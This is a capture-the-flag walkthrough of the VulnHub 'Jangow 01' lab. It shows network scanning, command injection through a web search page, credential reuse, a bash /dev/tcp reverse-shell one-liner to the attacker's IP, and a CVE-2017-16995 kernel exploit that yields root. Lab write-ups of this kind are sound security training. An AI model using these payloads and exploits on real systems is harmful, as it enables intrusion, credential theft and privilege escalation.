Setup Vulhub Machine: –
- First, we have to Download the Mirror image from VulnHub. (https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova)
- Open Virtual Box and click on Import and then select the downloaded file.
- Once You import successfully, You can now set the interface to Vbox guest addition. This process will help you in the Enumeration phase
- Check the Network Adapter, if it is set to Host-only adapter or not. Once you are done with the settings up, let’s start.
The Walkthrough: –
Step 1:- (Enumeration)
find out the target IP address using NetDiscover.
┌─(rootharsh㉿kali)-[~]
└─$ sudo netdiscover -i eth0
From the scanning, we have discovered our target IP address which is 192.168.111
Now, let’s perform a network scan to detect what ports are open.
Note:- Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks.
As in most cases we are going to use the famous Nmap tool.
- -sC: Used to perform a script scan using the default set of scripts,
- -sV: Enables version detection, which will detect what versions are running on what port.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.56.118
[sudo] password for rootharsh:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-28 14:35 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.118
Host is up (0.00064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:44:94:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.37 seconds
┌──(rootharsh㉿kali)-[~]
└─$From the output we have spotted that we have ports 21 and port 80 open.
- Port 21/TCP running an FTP service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
- Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.
To look at the contents ourselves, we can open a web browser of our choice and navigate to the target’s IP address in theURL bar at the top of the window. The URL redirects us to a broken link page:
We found that directory listing is enabled on the target machine. We found one folder named ‘site/’ in the current directory.
Step 2:- (Foothold)
Following the previously shown link brought us to this “Grayscale” site. Looking around there doesn’t seem to be anything too interesting except for the “Buscar” page found in the top right.
That’s interesting it looks like it’s performing some kind of post request. It seems like this website is vulnerable to Local File Inclusion.
The buscar seems to be like a Spanish word. If you translate it using Google translate on the web the result shows us like this.
It means we can search for anything from here. Let’s see what can we do with this LFI vulnerability.
Let’s search for the ls command to list the files and directories. Switch to view page source mode by clicking right on mouse > click on View Page source.
For a better view let’s switch to view page source by right click on the mouse.
Let me search again the ls -al command to list all hidden files.
From the output we have spotted a WordPress directory existing within it. After visiting the WordPress page, we notice that this WordPress is in a broken state. This may be happening because WordPress may not be able to access the database or maybe the WordPress database may be deleted.
Let’s switch back to the buscar tab,and find out if there any other files may be existing or not which may help us to gain an FTP connection.
I quickly notice that there’s a “config.php” file that seems to be contains something. Open the file using the cat command and read the contents within it.
This may be containing a username and password which may help us to gain access with the FTP client tool. Let’s try to attempt login access using the FTP client tool using the passwords with the username but I quickly discover that this does not work.
┌──(rootharsh㉿kali)-[~]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:rootharsh): desafio02
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> bye
221 Goodbye.
┌──(rootharsh㉿kali)-[~]
└─$The current working directory path is /var/www/html. Let me list all hidden files and directories that can be within /var/www/html.
I notice that there’s a “.backup” file that seems to be contain backup database credentials. Read the file using the cat command.
Let’s again try to attempt to gain access to the server using the FTP client tool.
┌──(rootharsh㉿kali)-[~]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:rootharsh): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp>You can find out the user flag from the jangow01 directory. You can read the flag.txt file by downloading it from the FTP server using the get command.
Way to Find a Reverseshell Connection
We need to find a way to escalate our privileges from the user jangow01 to the super admin role. One way to try this is by checking if a reverse shell connection is possible or not. Let’s examine the possible methods one by one.
Method 1: Using php-reverse-shell.php
A reverse shell connection is possible if we push a php-reverse-shell file to the server and execute it.
We can chain this with the LFI vulnerability that we have already identified, in order to upload malicious PHP code to the target system that will be responsible for returning a reverse shell to us. We will then access this PHP file through the LFI and the webserver will execute the PHP code.
We can either create our own PHP code or use one of the many available php-reverse-shell that can be found online through a Google search.
Firstly, we have to create a “test.php” file using the nano text editor.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nano test.phpPaste the code by pressing ctrl+shift+v. Now, modify the code so it can suit our needs. We are going to change the Listening Host IP and the Listening port variables to match our settings, and then we will attempt to upload the file.
But the upload can’t possible as the jangow01 user doesn’t have any permission to modify the web directories.
┌──(rootharsh㉿kali)-[~]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:rootharsh): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||54361|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> put test.php
local: test.php remote: test.php
229 Entering Extended Passive Mode (|||44573|)
553 Could not create file.
ftp>Method 2: Using Netcat
A reverse shell connection can also be possible with the Netcat command.
Type the following command:
┌──(rootharsh㉿kali)-[~]
└─$ nc 192.168.56.118 21
220 (vsFTPd 3.0.3)
USER jangow01
331 Please specify the password.
PASS abygurl69
230 Login successful.
ls
500 Unknown command.This is also not possible in terms of reverse shell connection.
Method 3: Using Bash Shell script
There is a method that can give us a reverse-shell connection. You find this code by searching on google.
/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/443 0>&1 'Modify this code IP address and port.
Take a look closer at the top of the URL bar at the top of the window, when we execute the script it automatically translates the bash script to a string.
There is a way to encode the bash script to an encoded URL string. Visit the URL encoder by searching on google.
- Visit: https://www.urlencoder.org/
Load the output code to the buscar.
Before running this script, you have to create a NetCat listener.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for rootharsh:
listening on [any] 443 ...Once this command is run our terminal will appear stuck, however, our Netcat listener has caught a connection.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for rootharsh:
listening on [any] 443 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.118] 35286
bash: cannot set terminal process group (2734): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$We got the foothold. The received shell is not fully interactive however we can make it a bit better by using Python3.
┌──(rootharsh㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for rootharsh:
listening on [any] 443 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.118] 35286
bash: cannot set terminal process group (2734): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jangow01:/var/www/html/site$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<html/site$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ export TERM=xterm
export TERM=xterm
www-data@jangow01:/var/www/html/site$Finally, we got the fully interactive shell now. Switch the user to jangow01 using the sudo su command and paste the password.
www-data@jangow01:/var/www/html/site$ su jangow01
su jangow01
Password: abygurl69
jangow01@jangow01:/var/www/html/site$Step 3:- (Privilege Escalation)
The next step is escalating to the root user in order to gain the highest privileges on the system. Switch to back the user jangow01 directory and list out all hidden files and directories that we have not listed before.
jangow01@jangow01:/var/www/html/site$ cd /home/jangow01
cd /home/jangow01
jangow01@jangow01:~$ ls -al
ls -al
total 36
drwxr-xr-x 4 jangow01 desafio02 4096 Jun 10 2021 .
drwxr-xr-x 3 root root 4096 Out 31 2021 ..
-rw------- 1 jangow01 desafio02 200 Out 31 2021 .bash_history
-rw-r--r-- 1 jangow01 desafio02 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3771 Jun 10 2021 .bashrc
drwx------ 2 jangow01 desafio02 4096 Jun 10 2021 .cache
drwxrwxr-x 2 jangow01 desafio02 4096 Jun 10 2021 .nano
-rw-r--r-- 1 jangow01 desafio02 655 Jun 10 2021 .profile
-rw-r--r-- 1 jangow01 desafio02 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02 33 Jun 10 2021 user.txt
jangow01@jangow01:~$For Privilege Escalation, we are going to use a tool called LinPEAS, which can automate a big part of the enumeration process in the target system.
- Download LinPEAS From Here: https://github.com/carlospolop/PEASS-ng/releases
Now, we have to transfer the LinPEAS.sh file to our target system by using the FTP service.
┌──(rootharsh㉿kali)-[~]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:rootharsh): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||44039|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> put test.php
local: test.php remote: test.php
229 Entering Extended Passive Mode (|||52084|)
553 Could not create file.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp> put linpeas.sh
local: linpeas.sh remote: linpeas.sh
229 Entering Extended Passive Mode (|||31406|)
150 Ok to send data.
100% |*************| 808 KiB 54.44 MiB/s 00:00 ETA
226 Transfer complete.
828260 bytes sent in 00:00 (49.41 MiB/s)
ftp>On the target machine, you can verify by listing the files and directories.
jangow01@jangow01:~$ ls -al
ls -al
total 848
drwxr-xr-x 4 jangow01 desafio02 4096 Mar 28 15:00 .
drwxr-xr-x 3 root root 4096 Out 31 2021 ..
-rw------- 1 jangow01 desafio02 200 Out 31 2021 .bash_history
-rw-r--r-- 1 jangow01 desafio02 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3771 Jun 10 2021 .bashrc
drwx------ 2 jangow01 desafio02 4096 Jun 10 2021 .cache
-rw------- 1 jangow01 desafio02 828260 Mar 28 15:00 linpeas.sh
drwxrwxr-x 2 jangow01 desafio02 4096 Jun 10 2021 .nano
-rw-r--r-- 1 jangow01 desafio02 655 Jun 10 2021 .profile
-rw-r--r-- 1 jangow01 desafio02 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02 33 Jun 10 2021 user.txt
jangow01@jangow01:~$As you can see, this file contains only read and write permission but does not have any execution permission.
jangow01@jangow01:~$ ls -al
ls -al
total 848
drwxr-xr-x 4 jangow01 desafio02 4096 Mar 28 15:00 .
drwxr-xr-x 3 root root 4096 Out 31 2021 ..
-rw------- 1 jangow01 desafio02 200 Out 31 2021 .bash_history
-rw-r--r-- 1 jangow01 desafio02 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3771 Jun 10 2021 .bashrc
drwx------ 2 jangow01 desafio02 4096 Jun 10 2021 .cache
-rw------- 1 jangow01 desafio02 828260 Mar 28 15:00 linpeas.sh
drwxrwxr-x 2 jangow01 desafio02 4096 Jun 10 2021 .nano
-rw-r--r-- 1 jangow01 desafio02 655 Jun 10 2021 .profile
-rw-r--r-- 1 jangow01 desafio02 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02 33 Jun 10 2021 user.txt
jangow01@jangow01:~$
As you can see, this file contains only read and write permission but does not have any execution permission.
jangow01@jangow01:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
jangow01@jangow01:~$ ./linpeas.sh #execute the LinPEAS shell script
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/—————————————————————————
| Do you like PEASS? |
|—————————————————————————|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|—————————————————————————|
| Thank you! |
—————————————————————————/
linpeas-ng by carlospolop
<MORE>
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
<MORE>
jangow01@jangow01:~$After analyzing the output we found a piece of important information that our target is vulnerable to these exploits.
Let’s try to exploit the get_rekt. You can find out the script from the exploit DB database.
- Click here to download: https://www.exploit-db.com/exploits/45010
Upload this file to the server using the FTP service.
┌──(rootharsh㉿kali)-[~]
└─$ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:mrdev): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 19:36 html
226 Directory send OK.
ftp> cd /home/jangow01
250 Directory successfully changed.
ftp> put ‘/home/mrdev/Downloads/linpeas.sh’
local: ‘/home/mrdev/Downloads/linpeas.sh’ remote: ‘/home/mrdev/Downloads/linpeas.sh’
local: ‘/home/mrdev/Downloads/linpeas.sh’: No such file or directory
ftp> put cve-2017-16995
local: cve-2017-16995 remote: cve-2017-16995
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
764129 bytes sent in 0.02 secs (32.9013 MB/s)
ftp>Compile the program to compile the exploit using GCC command-line utility.
On execution, it creates a new file in the current directory. Now execute the output file. On successful execution, we can see that the kernel exploit grants us root.
jangow01@jangow01:~$ ls -al
ls -al
total 812
drwxr-xr-x 7 jangow01 desafio02 4096 Fev 10 13:06 .
drwxr-xr-x 3 root root 4096 Out 31 19:04 ..
-rw——- 1 jangow01 desafio02 425 Fev 9 04:30 .bash_history
-rw-r–r– 1 jangow01 desafio02 220 Jun 10 2021 .bash_logout
-rw-r–r– 1 jangow01 desafio02 3771 Jun 10 2021 .bashrc
drwx—— 2 jangow01 desafio02 4096 Jun 10 2021 .cache
drwxr-x— 3 jangow01 desafio02 4096 Fev 9 03:57 .config
-rw——- 1 jangow01 desafio02 13728 Fev 10 13:06 cve-2017-16995.c
drwxr-xr-x 2 jangow01 desafio02 4096 Fev 9 04:56 GCONV_PATH=.
drwx—— 2 jangow01 desafio02 4096 Fev 9 03:58 .gnupg
-rwx–x–x 1 jangow01 desafio02 764129 Fev 10 12:56 linpeas.sh
drwxrwxr-x 2 jangow01 desafio02 4096 Jun 10 2021 .nano
-rw-r–r– 1 jangow01 desafio02 655 Jun 10 2021 .profile
-rw-r–r– 1 jangow01 desafio02 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r– 1 jangow01 desafio02 33 Jun 10 2021 user.txt
jangow01@jangow01:~$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
jangow01@jangow01:~$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(--t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(--t)
[.]
[.] * This vulnerability cannot be exploited at all on authentic grsecurity kernel *
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003dab8300
[*] Leaking sock struct from ffff88003998c780
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880035af9e40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880035af9e40
[*] credentials patched, launching shell…
#You can find the root flag to complete the challenge.
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&%@@@@@@@@@, @@@@@(%& &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709
#